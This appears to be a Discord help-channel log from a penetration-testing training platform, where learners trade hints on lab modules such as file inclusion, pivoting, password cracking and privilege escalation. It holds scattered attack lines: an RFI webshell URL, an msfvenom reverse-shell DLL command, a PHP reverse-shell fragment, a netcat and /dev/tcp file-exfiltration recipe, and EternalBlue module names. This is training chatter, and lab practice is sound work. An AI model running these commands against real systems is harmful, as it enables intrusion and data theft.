#modules

Hi!!
If any can help, most appreciated!

I got stuck on the Microsoft Fundamentals module, NTFS vs Shared Points section.

I have to set up a mount point with the given cmd, but when I do, it doesn't work. I tried using sudo apt-get cifs and update, but it get an error and doesn't really update either.

Any help?

I don't think so. It may take a few minutes. Try logging in and out.

windows fundamentals?

yes, i got the cubes. thank you for your response

Cool! Good Luck!

If its windows fundamentals I maybe able to help. DM me with the section and i'll do my best 🙂

Module and section are in the message

Thanks for replying 👍

@wind plaza pls be careful with spoilers...

Hi mate, any hint? I'm struck too

hi, I'm new

Don't dox me please

LOL

Thank you. Aready thought about that and tried to generate all tokens for all milliseconds one second past to one second after.
Maybe i made a mistake here. Will try again later.

in ntfs vs share permissions , first disable the rule for windows firewall or deactivate it . Then try mount command . If it doesn't show error but also doesn't show any results then add some kind of file in your shared folder so that it's not empty . If your shared folder is empty , then you won't see results as your folder is empty

Ok I need help with Password Attacks, Credential hunting in Linux. Just a nudge in the right direction please.

I have read the hint. Created password lists based on just the hint, used custom rules on the password.list file ran it against K and W and the whole username.list file and still nothing.

hint ||you can use the word in the hint with the custom rules to create a short wordlist||

I did that and still nothing

did you use that against user K (without cap k) and what service did you brute force?

ran against a list with K, k, W, and w. Tried SSH, SMB, winrm, ldap.

oh wait that's weird both ||ftp|| and ||ssh|| should work, i'm double checking right now and i don't see any winrm or ldap port

I dont see an ftp port open

without spoilers too much ||you are using the right username and if you use the short wordlist the password is in top 50||

Could I have a little bit of help with OSINT corporate recon?

In the "domain structure" section, it asks for a hosting provider. I did a whois. I am 99% sure my answer is right.

And in the "Email addresses" section I can't find the CEO's email. I have used TheHarvester and google dorks, but I still cannot find his email.

Hi, i need help with Pivoting, Tunneling, and Port Forwarding : Skills Assessment, so if someone has time, please DM me

@raven cairn DM me 🙂

hi

i don't remember the command sql for display the tables ?

i tries select * from [table] but it not true

might need to put semicolon at the end ;

but it not that

Select * from <table> ;

but the flag does not appear

i just found sorry

Holy fuck, ping sweep from powershell shows different results than cmd ping sweep

hey i might be able to help

Hi, on the SMTP from the Footpringint module, in the second question they ask you to use a wordlist to enumerate users, I tried it with different tools but any of them could find the username, what I'm doing wrong?

Under Resources you will find a Wordlist

I'm using it, but can't find anything

Ah okay, I see it.
Remember that servers can take longer to respond.

Even though all the ouput gives no result

the hint talks something about the usernames, but I can't really understand it

Standard Query timeout is 5 sec
If the server takes longer to respond, you need to increase this value.
https://www.kali.org/tools/smtp-user-enum/

Anyone able to assist in the File upload skills assessment. I feel a little lost at getting a foothold. Gathered a lot of information, that I just can't seem to put together the right way :/

Try to read the code of the PHP file.

I can't get it. Everything I throw at it just returns my code base64-encoded. None of it was actually proceed on the backend :/

DM

Thank you :)

If I pay for let's say the "Silver" plan where I get 200 cubes each month, will these cubes be added to my account or will I have 200 cubes each month to spend? So will I have after 2 months 400 cubes (if I don't spend them) or just 200?

They add up

thank you

Anyone available to give me a nudge on File Upload Attacks - Type Filters?

Is the Academy just an entirely different signup than the HTB?

yes its a separate account from the main website

hi i m blocket for tried to brute force with an password/login

i don't know what tools use ?

which

can someone give me some help on file upload attacks whitelist - I've successfully uploaded and tried 60 different name variations but I get 404 or permission denied when trying run commands.

dm me

hi can anyone help me with the easy lab footprinting ? i am stuck to finding the ssh key.

@rustic sage did you connect to ||the ftp? try looking for hidden files/folders :)||

@slow ruin DM me 🙂

Hey can anyone help me with starting point tier 1 (appointment) task 4? Im not sure where to find the classification name

viktus — Today at 7:57 AM
If ever, what error are you getting? I was able to get to this to work yesterday.
Some things to check:

1. firewall settings of target are updated
2. I'm not sure how critical, but "full control" for the Everyone group (ACE) in ACL for sharing
3. To be cautious I also installed cifs-utils prior to mounting

Module-Network enum with NMAP / HOST discovery question

Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result.

@cursive grove they are basically asking ||what a TTL of 128 means :)||

Is anyone available to help me with the footprinting module question on DNS? The final question is about finding the FQDN of the host where the last octet ends with "x.x.x.203". I've been on this for about 6 hours now and done literally everything I can think of with every single subdomain list on seclist and got absolutely nothing.

🙏 🙏 🙏

You need to find all the DNS zones

I'm now not sure I understand what a zone is...I've seen this response to previous questions, and I thought I understood at first but now I'm not sure. Can I dm?

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

Sure

Hi All, I have been stuck on Question 3 of Skills Assessment - Using Web Proxies for last 3 hours. Can someone guide me please?

Hey I am stuck in WordPress Skills Assessment. I can't figure out how to start, so feel free to give any hints to how I can proceed, either here og dm 🙂

find the wordpress site. Have a look at the source code of the website. Especially the links

did you solve the problem? i'm having the same issue, i found only three subdomains in the Attacking common services, dns section. then when i try to dig to any of them i can't find the flag. any hints?

I think I have checked about everything on the source code website, every link;|| index.html, about.html, services.html, gallery.html, error.html, contact.html||. Is it possible to get a deeper clue 😛

I think you missed a link.
What is Wordpress often used for?

If you get stuck, send me a DM

Try a zone transfer

i tried but with the subdomains i found it's not working

DM

Ohh the blog ofc.. thanks! I will dm you if I get stuck again! 😄

Hi, I'm stuck in the Skills Assessment section of the Hacking WordPress module.

I've managed to answer all the questions except for Question 5: "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.".

I have no idea what file/plugin they are referring to... Can I get a hint please?

Do a scan with wpscan incl. token. Then you should get vulnerable plugins displayed

Yes, got them all, I used the ||LFI vulnerability in Site Editor 1.1.1|| to answer question 6 and 7

how long does it usually take to spawn target in Active Directory Enumeration & Attacks module ?

DM

Can somebody help me with getting NTML hash of bross user in Active Directory Enumeration & Attacks in Attacking Domain Trusts - Child -> Parent Trusts - from Linux chapter?

have you found a way? Stuck on the same problem.

Good morning everyone!!

Starting my morning with a red bull and cracking an sha512 hash.

hello all,
I just do not get on with File Inclusion and have already invested a lot of time, https://academy.hackthebox.com/module/23/section/1491 "Illegal path specified! "
can someone help me

well theres a filter stopping you from entering that url, try to bypass it 👽

I've been trying to do this for hours 😉

yeah ik m8 but that whole module is supose to teach you how to bypass those filters

preg_match('/^./languages/.+$/'

i know ....

my ideas have run out

re-read the path truncation section.

the problem is that i do not get any error message on the website

thats good

😉

that means your url isn't being filtered out

Do you still need help on this?

Thanks, I have received help

i am on the the rfi page of the lfi module and i am wondering why index.php?language=http://0.0.0.0:8080/shell.php&cmd=id this url isn't working

Warning: include(http://0.0.0.0:8080/shell.php): failed to open stream: Connection refused in /var/www/html/index.php on line 47 Warning: include(): Failed opening 'http://0.0.0.0:8080/shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/index.php on line 47 i get these two notable warnings

you must replace the 0.0.0.0 ip

no i can still connect to the server in my browser with 0.0.0.0

and the port

and get the php file

language=http://127.0.0.1:8080/shell.php&cmd=id still gives errors

the correct syntax is ? not &
language=http://127.0.0.1:8080/shell.php?cmd=id

have you try your VPN IP address and start first NC on 8080

i tried that and still get the same error

yes and my browser can't even connect

to the vpn ip

are you using a webshell or reverse shell?

webshell

Should be

Shell.php?&cmd=id

Could also try and change the name of your shell.php extension to be .txt

nope still dosn't work

Damn

Why dont you try using the default cmd web shells that kali linux comes with?

locate webshells | grep cmd

These are much simple to server

Since you dont need to add the cmd=

Or anything else

Other than the name of the file

i am using parrot security

@deep delta maybe you have a problem with how you had to set the reverse shell

yeah thats what im thinking i think its the apache server

because in my browser i can go to it

but not on the web page

@deep delta what if you set up a reverse shell using nc

whats nc?

@placid quest

@deep delta netcat

ahhhh

how would i go about doing that?

https://academy.hackthebox.com/module/23/section/254 if anyones done this section could you walk me through how to do it

if you follow along with the section you will get the answer

Hello, Im working through the Shells & payloads module and on the php web shells section. I keep getting WARNING: Failed to daemonise. This is quite common and not fatal.(111). Not sure what i'm doing wrong here would anyone be able to help me please?

stuck on privileged groups linux privilege escalation exercise

/module/51/section/477

cool name. i met the guy Benoit when he worked for Battelle in Cambridge, MA a long time ago.

Really? That's really cool

yeah he told me that nothing in this world is smooth

only in 3d renderings heheehe

wise words XD

Anyone got some advice on footprinting IMAPs and POP2

POP3*

I dont really get what one would get out enumerating them other than mass spamming emails. I also couldn’t figure out how to use commands within the IMAPs server once connecting. I tried selecting a mailbox to look at the messages inside but I just kept getting bad IMAPs command error

the imap server u gotta preface them with a character i forgot what it is but i think it's a

if you're connecting raw

type ahelp

A1 yup

I connected to the IMAPs using OpenSSL

And the POP3 server I used OpenSSL as well. I tried enurmating the IMAPs server with curl

But it didnt really tell me the admin email

what are u on send the link

https://academy.hackthebox.com/module/112/section/1073

hope it isnt too much trouble btw, thanks for the help

which question are u on

the one asking for the admin address and access the IMAP server emails

ahh yesa

Thanks!

bump

havent done that but what part are u stuck in?

it's just 1 question

"Use the privileged group rights of the secaudit user to locate a flag."

yeah

you have the privs to read commands

you can do ls -la

in the /var/log?

look for all directories where u have group permission read access

and recursively list their files

Hey all apologies in advance for the noob question but i'm stuck on the priv esc portion of "knowledge check". I tried sudo -l but can't access the file. I'm new to priv esc so any help would be appreciated.

also the directory listed when i type sudo -l doesn't exist, and I can't make it.

u mean skill assessment ?

this module is what i'm on

linux priv esc module ?

hi i'm on the "pivoting" room on the "Remote/Reverse Port Forwarding with SSH" part. I tried to apply what i learn in this section without success. i get the .exe on the windows machine, i used this command to make the windows communicate with my kali :
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.202.64 -vN
The msfconsole doesn't get the shell but the ssh command tells me :

pff lets give serverside attacks assessment a new try

how is it possible that i cant complete it:(

took me 3 hours to complete another module before i thought of trying admin:admin

how i hack somebody

Hi guys, i think the module https://academy.hackthebox.com/module/35/section/224 bugged

at POST section

the answer is []

i tried many times, even followed a tutorial 1:1

if anyone could check it for me I would be thankful

it's about getting cookie session to log into a search.php of a flag

Well start learning

u can do it here on htb or go and join anonops then #learninghub

they have also a lot of stuff

https://goldmine.anonworld.us/

depends on what u want

then i would start with htb academy

I asked the same question a few days ago, you have to use your own browser

what does that mean

Instead of using the pwnbox, setup your own VM or use your own browser

I'd suggest creating your own VM as it is easier

i aint using pwnbox, i use cmd or a browser

most of the time both

but I am alright with knowing that there are some problems with this section, and that wasn't really my fault

so thank you 🙂

does it need a good computer to run smoothly?

The section is possible, I finished just it yesterday - make sure to precisely follow the guide

doesn't really matter afaik

good, ill try to do it on a laptop then

and you need to search for the flag

yea i did i precisely

If you're still struggling you can also DM me

what are you using to type the commands? i am just using a basic windows10 command line

okay ill dm you not to spam

I setup a ParrotOS VM myself

can someone please awnser me a question about server side attack sessment

if the awnser is no ok i move forward

ername wordlist

fuck

If possible, I need a nudge on SQLMap Essentials. For Case #10, I keep getting POST Parameter 'id' might not be injectable and I am not understanding why

@vale salmon DM me 🙂

DAMN FINALLY

stupid ctf while i try to use things learned in the module

yeey

congrats!

tnx:)

Some say, "work smarter, not harder."

Hello, is this the best place to ask for a hint on an HTB academy module?

I'm working through Getting Started (https://academy.hackthebox.com/module/details/77) and am stuck on the solution for page 9. I think I'm on the right path, I'm just missing something.

Sure is!

So far, I have already done
||msfconsole
use scanner/http/wp_simple_backup_file_read
set RHOSTS (ip)
set RPORT (port)
run||

I can see the output that metasploit returned
||/home/kali/.msf4/loot/20220806165131_default_178.62.115.160_simplebackup.tra_069605.txt||

I've also found
||(ip:port)/wp-admin||
I just can't seem to figure out how to use a ||username & password against wp-admin||, since the information in the txt shows ||encrypted passwords||

what is the subject? Priv Esc?

The subject of the page is Public Exploits. The question at the bottom reads

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

It's basically an introduction in how to find exploits, and configure/run them against web servers

Ok, I've gone back to remind myself of this one - I wasn't taking good notes back then so I had to re-do it.
You've solved it already. Make sure you have set the FILEPATH in MSF properly to what you're looking for. Then go in and read the file that has been written to your machine at the location listed (i.e. /home/kali/.msf4/loot/20220806165131_default_178.62.115.160_simplebackup.tra_069605.txt)

So the exploit is reading the specified file on the web server (as per what you put into metasploit), and then writes it out to a file on your local machine.

So filepath should look something like
||set filepath /flag.txt||?

Yep

Ah! Finally!!!

Thank you so much, @manic ermine! I knew I was close, I was just like "WHAT AM I MISSING HERE!?" 😆

Alright, I'm out for now. That has been bugging me for a few hours. I'll pop back in if I have more issues. Thanks again, @manic ermine 😄

NP - trust me, that is an experience you'll get VERY used to as you work through the academy. I'm only one course away from finishing the Pen Tester path and it's taken me many months haha.

Oh dang, looking to complete that myself. Excited for you, dude! 😄

im doing the metasploit module now🤣

me too

I found that I can't pwn the machine with my own computer with vpn, I can only gain access when I use pwnbox, how about you?

I use openvpn

can you create session successfully

well not right now

i switch

probably

I dont know if it is a big problem or just use pwnbox in this module

FTR if anyone else gets stuck on this, you need to use impacket’s secretsdump.

Can anyone assist with this issue of mine? I'm in the "WEB REQUESTS" mod and at the end answering the question to "Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'" to which I've aquired the cookies to the site the Target took me to and ran the following code in the terminal "curl -X POST -d 'username=admin&password=admin' -b 'PHPSESSID=scl9tv8j6heti8hobegvasghio' -H 'Content-Type:application/JSON' http://178.62.115.160:30959/search.php
" and I'm meant with "Received content contained invalid JSON!" please no answers just guidance to something I may be missing or a push in the right directions#WebRequests

I know it's has to be with something with the Header or the flags I'm using but missing something and it just not clicking with me.

first if you got the "session cookie" you don't need the cred for this and also you didn't "search for the flag"

try with some of the example under ||JSON Data|| in that section

Getting somewhere now thank you, "The requested URL was not found on this server" I have been having issues with the Target ip stop working after being on it for bout an hour might you know if this could be the case? refreshing takes a min so I dont want to unless I have to

your target box are just out of time, just spawn a new one this is a docker container so it's going to take like 2 second

Yeah just did it and sure enough it did only take 2 sec

Got it, just abunch of syntax errors had the right idea the whole time. Thanks again MRtom

Windows Privilege Escalation -SeDebugPrivilege

Did everything work for you the first time? Or did you need to Enable status to "debug programs"?

Hi, in the Intro to Network Traffic Analysis (module 81 section 787) what format am I expected to answer the question "What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)" I tried ||80 1030|| but that didn't work.

I understood what needs to be done manually using the task manager.

but problem repeated

Hi everyone,
I am stuck in this Nmap module(easy lab), which tells us to find the name of the OS, here is what I tried so far:
command 1: sudo nmap ip_addr -sS -p 1-100 -v -Pn -n -O -T1 --max-retries 5 [This is not giving me the exact OS, rather Nmap is guessing it, I cannot scan all the ports as it takes a lot of time and HTB target machine is limited to 60 min]

I then used this command, I used -sA option with the following :
sudo nmap target_ip_addr -sA -p 1-100 -v -Pn -n -O -T1 --max-retries 5 [Nmap gave me the OS name but when i entered this in the answer section, HTB is telling me its a wrong answer!]

Am I missing something silly here!? [I am a noob by the way!]

Hi everyone , im stuck in module Broken Authentication - Bruteforcing Passwords , i thought i found the password policy include at|| least 3 characters including uppercase , lowercase , and numbers|| , i did a filter for matching characters in the list from rockyou-50.txt but no which password is correct, where did i go wrong?

I use the grep command as follows:
grep '[[:upper:]]' /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-50.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '^.{0.12}$'

||Password1
Princess1
P@ssw0rd
Passw0rd
Jesus1||

It turns out that this error is due to the fact that I made the dump on the x64 system, and Mimikatz launched x86

hello

hi

is htb academy free?

@oak sigil yes

ah nice, thank you

@oak sigil but some modules you need to pay

would you be able to tell me which these are?

@oak sigil You will find out if you have access to academy hackthebox

You are not using the correct password policy, try with the table the academy provides you to test

Module : Using Metasploit Framework
Sub : Sessions
can anyone help with the final question for this? I have run the ||local exploit suggester||, and tried ||exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec||, ||exploit/linux/local/pkexec|| and ||exploit/linux/local/su_login|| to no avail. It says "target appears to be vulnerable" and "exploit completed, but no session was created". p.s. i have confirmed I've correctly set LHOST.

I have used the table, and found that the password is at least 3 characters long, including 3 types of characters uppercase, lowercase, number

Keep trying, there is something you are missing

did u get any answers ? i get the same error. i tried to scp the library but still getting errors

which question is this?

It's the one in the "sessions and jobs" page

the one with vulnerable sudo?

@iron plaza yeah, that's the one

instead of using the local exploit suggester ... search for an exploit related to sudo

@iron plaza, hmm ok, so none of the ones I mentioned are correct then?

don't know what else was in your suggested list but the ones you mentioned are not it

Oh, ok, awesome, thank you @iron plaza

If this command is not working check the syntax. If the syntax is correct yet the command is still working

is still (not) working i guess

Hi, I am having troubles with Web Service & API Attacks - Skills Assessment. I can not even craft a login request that is accepted. Please DM me

u can dm if u want

does anyone have had this error on the pivoting module "RDP and SOCKS Tunneling with SocksOverRDP" section

Does anyone know if there exist a module in the Academy to work on Python scripting skills ? I feel like it is becoming almost a must to script in Python for many positions on the market :/

https://academy.hackthebox.com/module/details/88

Thanks for the link ! It seems to be pretty light when it comes to scripting & security. I guess the module is there to mainly introduce the language to the people who are not familiar with programming. I believe this module is the only one ?

Yes, that's all there is at the moment.

Hello i am stuck in /module/23/section/513

i tried many things it teached me, but i failed. Can anyone push me in the right direction

on the pivot module the las part (full windows)
I get errors all the time. like, the dll is seen as suspicious so windows delete it.
I can't even connect to the other machine using mstcs
any guess ?

https://academy.hackthebox.com/module/23/section/254 i asked this yesterday but still after another hour today i am still stuck on the same page: ive read through the whole thing many times but i still don't understand why this link: index.php?language=http://127.0.0.1:80/shell.php&cmd=id won't give me rfi?

thats the local ip

yeah ik

try hosting a http server and put your own ip

You need to disable Defender first

im stuck in the same module the final one is hard

seems down to me isn't it ?

ive tried my vms own ip but it still can't connect

If the DLL is automatically deleted, then something is still active.

mmhh ok i'll try to find what

try tun0

dont forget the port

dosn't show when i run ifconfig

Check this

Settings > Windows Security > Virus & threat protection > Virus & threat protection settings > Real-time protection

connect to the academy vpn and try ip a

still dosn't show

do i need open vpn to be in my vm?

yes

thank you i think thats the problem

its on my main pc

yeah there was indeed on last option on 🥲 😅

The firewall (your printscreen) does not delete files. Antivirus on the other hand does 😉

@naive pelican thanks m8, i didn't realise the problem was that small 😄

no worries mate

i wish someone helped with my problem too 😢

What is Module 23, Section 513?
Please say the name of the module, it's easier.

file inclusion

im stuck on skills assesment

Did you have a close look at the source code of the index.php file?

||i found ?page=, when i fuzz this to try to read /etc/passwd with LFI-jhaddix.txt i had no luck||

You are in the right place, but the file you want to read is not helping you. ||Read the code of the index.php ||

can anyone help me?, I found 4 passwords that match the password policy, but failed to login

i know what to do next thank you

There are more passwords that would fit. The password you are looking for is not in your list.

so I'm not using regex + grep correctly?

i think so
You can DM me your command and I'll take a look.

so can you suggest me the correct grep for this question?

DM

thanks ❤️

Reposting this, if someone can help, thanks in advance!:
Hi everyone,
I am stuck in this Nmap module(easy lab), which tells us to find the name of the OS, here is what I tried so far:
command 1: sudo nmap ip_addr -sS -p 1-100 -v -Pn -n -O -T1 --max-retries 5 [This is not giving me the exact OS, rather Nmap is guessing it, I cannot scan all the ports as it takes a lot of time and HTB target machine is limited to 60 min]

I then used this command, I used -sA option with the following :
sudo nmap target_ip_addr -sA -p 1-100 -v -Pn -n -O -T1 --max-retries 5 [Nmap gave me the OS name but when i entered this in the answer section, HTB is telling me its a wrong answer!]

Am I missing something silly here!? [I am a noob by the way!]

@wraith sapphire i was able to solve it using ||nmap -A (look at how it fingerprints the SSH service, it should reveal a specific linux distro.)||

Need help with the shells and payloads module, the skills assesment in the tomcat part, I have done this like two times, but with the nomachine connection I can't properly see and don't know if I'm missing something

will try this, I got the specific linux distro when I used this: sudo nmap target_ip_addr -sA -p 1-100 -v -Pn -n -O -T1 --max-retries 5
But HTB says my answer is incorrect! But let me try what you told me, also, can you help me with what am I getting wrong in my commands? I am not sure why they are not working

sec i will DM you 🙂

-sA might be messing you up since that's an ACK scan

Which question are you stuck on?

can I dm you?

sure

Someone available to help me in lfi assessment task?

Where exactly are you stuck?

In the final step to read the flag

i connected to hackthebox academy vpn on a vm and now i can't use commands and whenever i press ctrl+c it disconnects from vpn

ignore the white discord theme ;-;

With ctrl + c you cancel the current command and close the VPN connection. This is normal.
What exactly are you trying to do?

i'm trying to connect to hackthebox academy vpn

i ran the command openvpn academy-regular.ovpn and it worked the problem is that now i can't execute commands

Leave this window as it is and open a second shell

do not use your main OS for connecting to the VPN

this is a recommendation

next recommendation would be to choose a OS, ubuntu, kali or parrot to use it as a virtual machine

I'm using a virtual machine made by Microsoft azure

it's an ubuntu

if its WSL, feel free to use tmux to manage multiple screens/terminals

This module could be helpful for you
https://academy.hackthebox.com/module/details/87

hello anyone who has completed the File Upload Module?

Anyone able to provide a hint on the knowledge check portion of the nibbles box for the Cracking into Hack the Box module? I am at the last exercise with the 2 questions. I am struggling to understand where i should look for a password for the get-simple admin login, any clues would be most appreciated!

plenty of walktrhoughs on that use your favorite search engine

Ah. Okay, thanks anyway

any difference with these multiplexers than the ones already built into the terminals of parrot/kali?

does Password Attacks take much time? Or with the correct wordlist just a few seconds? I'm just in the first section and spend like 15 minutes brute forcing

Windows Privilege Escalation Print Operators Tools doesn't include UACMe repo or binaries.

Could I get some nudge on it, please?

@radiant dagger i might be able to help

is there anything here on reverse engineering wireless data I am trying to learn that since I am a TSCM professional I need to do Signal Intelligence.

tbeyres some academy modules on reverse engineer binary code. and a few reverse engineering windows exes and stuff. If you mean simply monitoring wireless packets and seeing how they are structured and what they contain thats more like network traffic analysis theres a module on that and plenty of material about wireshark , tcp dump

might want to search for turorials on kismet as this is an open source program designed to do signals intelligence

https://www.kismetwireless.net/

no this is more military grade signals such as a UWB Comb signal that can penetrate the earth or anything

ground penetrating radar specifically that generates pressure waves

trying to do sigint on the data inside it

man ya sounds like some deep stuff dont think they go over military style signals int and electronic warfare specifically here on hack the box. THough alot of the stuff learned here can transfer over.

hmm wont let me upload a image of the signal

if anyone thinks they can get the audio out of the IQ data let me know DM me.

kind of what I do is analyze wireless data and demodulate it to make since of it

Think you can do image upload but only in a one on one chat

Need a nudge on File Upload Attacks - Limited File Uploads. Crafted the ||XXE exploit|| then uploaded the exploit went to the directory of where it was uploaded and viewed the source but got nothing. The page says XML file does not appear to have any style information associated with it.

nvm got the flag!

What would be the best way to download a file locally to my attackbox, while ssh'd into a machine with escalated privileges?

I ended up just cat'ing a file, copy and pasting the text locally, but I feel like there's a more obvious way to do it.

Sources online were talking about doing something like scp -P (port) username@(ip):/file/location /local/dir but I had to escalate from one account to another in order to read the file, so that doesn't really apply. Is there a different command I should be using?

if you are talking about retrieving a file:
on your machine: nc -nlvp PORT > file
on the target: cat file > /dev/tcp/IP/PORT

We are currently investigating an intermittent issue with spawning the workstation on Academy.

^ A fix has been pushed, please if are experiencing the issue, try respawning the workstaiton.

Hi i'm having some problems in the Dynamic Port Forwarding with SSH and SOCKS Tunneling section because after i pivot successfully to the target and i scan it with nmap i only found port 22 and 80 opened and i don't understand how to connect to rdp. any hints?

i've the same problem can i dm you

proc_open('sh' , array(0=>$sock, 1=>$sock), $pipes) ```

hello can someone please explain what the array and $pipes is doing in this shell

ldd --version

Can engine tell me a good python coding tutorial for free

Anyone*

Maybe this
https://www.youtube.com/watch?v=7utwZYKweho
or this
https://www.youtube.com/watch?v=mRMmlo_Uqcs&list=PLIhvC56v63ILPDA2DQBv0IKzqsWTZxCkp

Those are both excellent sources.

Thanks a lot

on windows priv esc "DnsAdmins" part, i manage to get my user in the DnsAdmins but can't access the flag. Some people on the serv said we need a reverse shell but what is wrong in my reverse shell creation ?
msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll -o shell.dll

The hint says It is in this form: HTB{...}

you missed a character

Oh, which one ?

after you run the code thru prettier, take the output and run it thru jsnice

Please don't post flags even if incomplete

Sorry

@candid sandal feel free to DM me

I followed the steps you mentioned and I found the missing character. I initially thought that the purpose was just to find the flag in the sources, but it seems that it required to use some tools (not mentioned in the lesson) to find the correct flag to sumbit

Hi ,If I want to fuzz two parameters in Intruder of Burp ? like this:
id=1&pass=a,
id=2&pass=b,
id=3&pass=c, and so on，How can I set the payload?
Thanks

I just used the two sources the module mentioned to deobfuscate and got the answer.

you're right, I never look at the cheat sheet

can I get a sanity check on Password Attacks? On the section Linux Local Password Attacks/Passwd, Shadow, & Opasswd. I have grabbed the files, created the unshadowed file, and ran it against rockyou with hashcat but found no passwords. I am pretty sure 1800 is the correct setting. What am I doing wrong?

Feel free to DM me

Thanks for your help.

@lethal atlas can I dm about file upload attacks - file type ?

of course.

File Inclusion - Automated Scanning - I think this section is broken. When you follow the tutorial step by step it doesn't work

Can I have sanity check on Shells and payloads - "The live engagement"?

Skills assesment should be pretty easy but my reverse shells aren't working

DM me

Can someone help me with "File Inclusion - Automated Scanning"?

@half cave DM me 🙂

Where exactly do you need help? What have you already tried?

Oh, @west canopy was faster

Anyone able to help me out with file upload attacks skills assessment?

feel free to dm me

hi im block for a question help please

With which module do you need help?

responder

Maybe you ask here:
https://discord.com/channels/473760315293696010/691583669374025802

Hi guys! i need help with lab medium of footprinting module. I don't understand how to change to administrator user

feel free to DM me

ok!

Can you accept me pls?

Hi i want to skip google access if you have idea or way dm i will buyed not problem

could i get a bit help with the linux fundamentals module, for example it asked me for the kernel version which i did uname -v for and the value i get is apparently not the right awnser; pretty much everything is not the right awnser is this module broken?

try -r instead of -v

still not

I dont think its broken.

I agree. Not broken

@hollow pike did you SSH into the target and then run the command?

oh about that, thank u for the reply but yeah, i messed up on that part, already got guided tho, turns out i was doing these commands on pownbox not the target, still appreciate the response

I am still stuck on the knowledge check for the final part of Cracking into Hack the box, I tried to escalate privileges on the target but it returned an error, is there something other than LinEnum.sh i need to use for this?

even tried Linpeas.sh, cannot write to, permission denied

w t f

been a while so might not be remembering correctly I thought you ssh into that target. Create ssh keys on your own attack machine copy them over to victim machines ssh folder. THen you can ssh to the target and the account you will be on has root access.

The cheat sheet too contains some of the commands you would need to escalate proveldges and the folder you need to put your ssh keys in

this is exploiting a permissions misconfiguration of the ssh folder of the root account on the victim machines which allows any user to write to the folder thus you can input your own keys into it and ssh into the target machine as root.

the lesson starts you off working your way into a machine where you exploit a code execution vulnerability

you upload a .php code to trigger a reverse shell connection into an image upload

i have no clue about any ssh or the likes yet

all of that i did without issue, but then moving on into the knowledge check i was able to replicate the same sort of action through the themes edit page on the next target

just by putting the reverse shell code into the themes edit field, then visiting that page executes the reverse shell

but this environment is behaving as if the LinEnum.sh script didnt REALLY escalate my privileges or something

even though I did eventually get it to allow it

but once i cd to the /home directory, its still giving me a hard deny and sudo spits out how a terminal is required to read password

defintely learn a little more about ssh its very common use in I.T . basically just allows you to access another computer remotely and interact with it through a terminal window.

Yeah thats not exactly what I meant by that, I was just saying i was under the impression that the lesson knowledge check would follow the same formula. Not have me go off trying to do something i have only ever even done in a networking class a year ago.

Thats all im saying haha

Thats the charm and bane of hack the box some of the lessons will kind of go off the beaten path they want you to do your own research and get help from others too as alot of times in pentesting and cyber secuirty scenarios youll constantly run into novel situations and will need to do your own research.

Better to learn the hard way then the easy way

All right, fair enough

I've been working on the skills assesment on the shells and payloads section for 6 hours today. Im F'ing done with it man

could I have another sanity check please

Having issues with exploiting eternal blue

https://tenor.com/view/rip-juice-cry-cat-kitten-tears-gif-15751834

This is me right now ^^^^

theres a metasploit module that automates eternal blue exploitation could try that

I have been trying the metasploit module.

gave you the general solution already but if you need more help you can DM me

well another common trouble shooting is if your using your own VM why not try it inside the pwnbox see if you get different results

I have also been using it in pwnbox 😢

I have been changing the payload to and that hasn't been working either

theres a couple of eternal blue modules in metasploit maybe try a different one

0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution

I havent done the shelll/payloads module yet specifically so dont know much else to help you. Only done a few boxes that utlizied eternal blue exploitation and the metasploit modules always worked for me.

dont know much about the machine your doing you sure its vulnerable to eternal blue? Could run a nmap script that checks for it

nmap --script=smb-vuln* <target ip>

HOLY FUCK

I GOT IT

WHAT THE FUCKING FUCK

I HAD THE WRONG LHOST

https://tenor.com/view/cat-catcry-gif-19131995

AFTER 6 HOURS

OH MY GOD!!!

rofl

Thank you for advice

well glad you got it

My vs code stopped working, actually I can write codes in it but it can't run them, I have to open the python file with shell to run it can anybody help?

Hi everyone,
Requesting help on Nmap module: Hard lab
Honestly, I didn't understand the question on what service version are we expected to find, I ran Nmap along with version scans and found SSH and HTTP port open along with their version, but thats not the correct answer. Hint talks about customer wanting large amounts of data(I initially thought about FTP!!) but then only HTTP and SSH is open.
Can someone give me a clue on what needs to be done here? Is there some flag that I need to find?
[P.S: Complete Noob here!!]

@wraith sapphire DM me 🙂

Is somebody available to help me get he double pivot working to MGMT01 on Attacking Enterprise Networks module (post exploit section). The handler on my host doesn't catch DC01 payload even tough everything is set up ok.

@manic ermine i might be able to help !

Amazing, can I DM?

sure 🙂

Hi, everyone requesting help for Broken authentication predictable reset token. I modified the script to make it the admin user, concatenated the user and time together, and md5 the combined string value and brute forced with the time differences included but still no hit. Cant seem to figure it out any help is appreciated thanks.

i've the same problem how you solved it?

yes but dont exactly remember how i solved it

Because i do everything that is written in the module and the connection to the rpivot server is but when i use proxychains to search the page there is an infinite loading

now i'm getting this strange output when getting a shell (windows PE, dns part) :

anyone knows why is this happening ?

ls

i get the same error on skill assessment 1 when i try to execute my uploaded shell

Active Directory Enumeration & Attacks / Bleeding Edge Vulnerabilities. Any one to DM for help?

with which tools you find vulnerability

help

hello guys

i am new into hacking

i really would appreciate if i get help

beacause i really want some help

cuz i like hacking very much

